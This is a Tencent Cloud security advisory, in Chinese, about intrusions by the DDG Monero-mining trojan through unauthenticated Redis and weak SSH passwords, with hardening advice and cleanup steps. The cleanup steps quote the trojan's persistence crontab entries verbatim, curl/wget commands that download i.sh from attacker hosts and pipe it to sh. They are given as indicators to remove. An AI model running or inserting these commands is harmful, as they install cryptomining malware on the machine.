专栏首页云鼎实验室的专栏【安全预警】关于DDG挖矿木马家族入侵事件客户修复通知
原创

【安全预警】关于DDG挖矿木马家族入侵事件客户修复通知

尊敬的腾讯云客户,您好:

  近日,腾讯云安全中心监测到部分用户云主机被植入门罗币挖矿程序攻击者主要利用Redis未授权访问、SSH弱密码、 OrientDB数据库远程命令执行、Struts2 S2-052远程代码执行等多种漏洞入侵服务器

       腾讯云安全中心建议您及时开展自查并进行升级修复,避免业务和经济损失。

【风险详情】

根据腾讯云安全中心的分析,遭受攻击的机器主要感染 DDG 挖矿木马家族,该木马包含 downloader 和挖矿模块,主要通过Redis未授权和Linux 弱口令漏洞来实现入侵攻击,进而远程控制服务器进行挖矿等操作。

【风险等级】

高风险

【问题影响】

远程控制主机,消耗主机资源进行挖矿

【修复建议】

   Redis未授权访问:

   1.)为 Redis 添加密码验证(重启Redis才能生效)

   2.)禁止外网访问 Redis(重启Redis才能生效)

   3.)以低权限运行Redis服务(重启Redis才能生效)

   详细操作请参考:http://bbs.qcloud.com/thread-30706-1-1.html

   SSH弱口令:

   修改口令,增加口令复杂度,如包含大小写字母、数字和特殊字符、增加密码长度等。

【挖矿木马清理方法】

请按照以下处理步骤处理:

1、

crontab如果包含:

"*/15 * * * * (curl -fsSL http://104.248.181.42:8000/i.sh||wget -q -O- http://104.248.181.42:8000/i.sh) | sh"

"*/15 * * * * (curl -fsSL http://ddgsdk6oou6znsdn.onion.in.net/i.sh||wget -q -O- http://ddgsdk6oou6znsdn.onion.in.net/i.sh) | sh"

"*/15 * * * * (curl -fsSL https://ddgsdk6oou6znsdn.tor2web.io/i.sh||wget -q -O- https://ddgsdk6oou6znsdn.tor2web.io/i.sh) | sh"

请清理;

2、

/var/spool/cron/root文件,如果包含:

"*/15 * * * * curl -fsSL http://104.248.181.42:8000/i.sh | sh"

"*/15 * * * * wget -q -O- http://104.248.181.42:8000/i.sh | sh"

"*/15 * * * * curl -fsSL http://ddgsdk6oou6znsdn.onion.in.net/i.sh | sh"

"*/15 * * * * wget -q -O- http://ddgsdk6oou6znsdn.onion.in.net/i.sh | sh"

"*/15 * * * * curl -fsSL https://ddgsdk6oou6znsdn.tor2web.io/i.sh | sh"

"*/15 * * * * wget -q -O- https://ddgsdk6oou6znsdn.tor2web.io/i.sh | sh"

请清理;

3、

如果存在在/var/spool/cron/crontabs目录,请检查

/var/spool/cron/crontabs/root文件,如果包含:

"*/15 * * * * curl -fsSL http://104.248.181.42:8000/i.sh | sh"

"*/15 * * * * wget -q -O- http://104.248.181.42:8000/i.sh | sh"

"*/15 * * * * curl -fsSL http://ddgsdk6oou6znsdn.onion.in.net/i.sh | sh"

"*/15 * * * * wget -q -O- http://ddgsdk6oou6znsdn.onion.in.net/i.sh | sh"

"*/15 * * * * curl -fsSL https://ddgsdk6oou6znsdn.tor2web.io/i.sh | sh"

"*/15 * * * * wget -q -O- https://ddgsdk6oou6znsdn.tor2web.io/i.sh | sh

请清查;

4、

请检查

/usr/bin/,/usr/libexec/,/usr/local/bin/,/tmp目录下,是否包含以bcc结尾的可执行文件,

如果存在请计算md5,如果md5值为:d894bb2504943399f57657472e46c07d,

请结束此文件对应的进程,删除此文件。

5、/tmp目录下,如果包含

qW3xT.2, ddgs.3010, ddgs.3011, ddgs.3013, ddgs.3016, wnTKYg, 2t3ik等文件

请清理;

6、

清理完成后,请观察一段时间(半天)服务器。如果仍然存在挖矿进程(长时间100%占用CPU),请重装系统以避免进一步的损失。

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 安全报告 | 2018上半年互联网恶意爬虫分析:从全景视角看爬虫与反爬虫

    云鼎实验室
  • Hadoop Yarn REST API未授权漏洞利用挖矿分析

    云鼎实验室
  • Linux Redis自动化挖矿感染蠕虫分析及安全建议

    云鼎实验室
  • Linux之进程管理(3)作业管理

    后台作业虽然被送往后台允许,但其依然与终端相关;退出终端,将关闭后台作业。如果希望送往后台后,同时剥离与终端的关系。可以使用下面两种方法:

    py3study
  • Hadoop数据分析平台实战——020Hadoop Shell命令(初学跳过)离线数据分析平台实战——020Hadoop Shell命令(可跳过)

    离线数据分析平台实战——020Hadoop Shell命令(可跳过) Hadoop Shell命令简单描述 Hadoop的Shell命令主要分为两类: 一类是启...

    Albert陈凯
  • 简单对比WDCP与宝塔面板WEB环境区别与选择建议

    老左在"简单对比LNMP与OneinStack一键包区别与选择建议"文章中有简单谈了谈个人对于LNMP和OneinStack的看法,其实两者都各有优势和各自的用...

    拓荒者
  • Android运行时权限终极方案,用PermissionX吧

    有些朋友的阅读速度真是令人印象深刻,我记得在《第三行代码》刚刚发售一周不到的时间里,竟然就有人已经读到第9章了(因为公众号后台有人回复第9章里隐藏的关键字)。现...

    用户1158055
  • 理解Linux文档的默认安全机制、隐藏属性、特殊权限,妈妈在也不用担心你从删库到跑路!!!

    前面的章节 详解Linux文档属性、拥有者、群组、权限、差异,介绍了文档的基本权限,包括读写执行(r,w,x),还有文档若干的属性,包括是否为目录(d)、文件(...

    justmine
  • 嗅探、中间人sql注入、反编译--例说桌面软件安全性问题

    今天这篇文章不准备讲太多理论,讲我最近遇到的一个案例。从技术上讲,这个例子没什么高深的,还有一点狗屎运的成分,但是它又足够典型,典型到我可以讲出很多大道理用来装...

    用户1631416
  • 大牛书单 | 数据库专题好书分享

    导语:读书是一生的功课,技术人通过读书实现自我提升,学习优秀技术沉淀。TEG读书会本期特邀腾讯金融云专家工程师李海翔、TEG计费平台部专家工程师雷海林、MyS...

    腾讯技术工程官方号

扫码关注云+社区

领取腾讯云代金券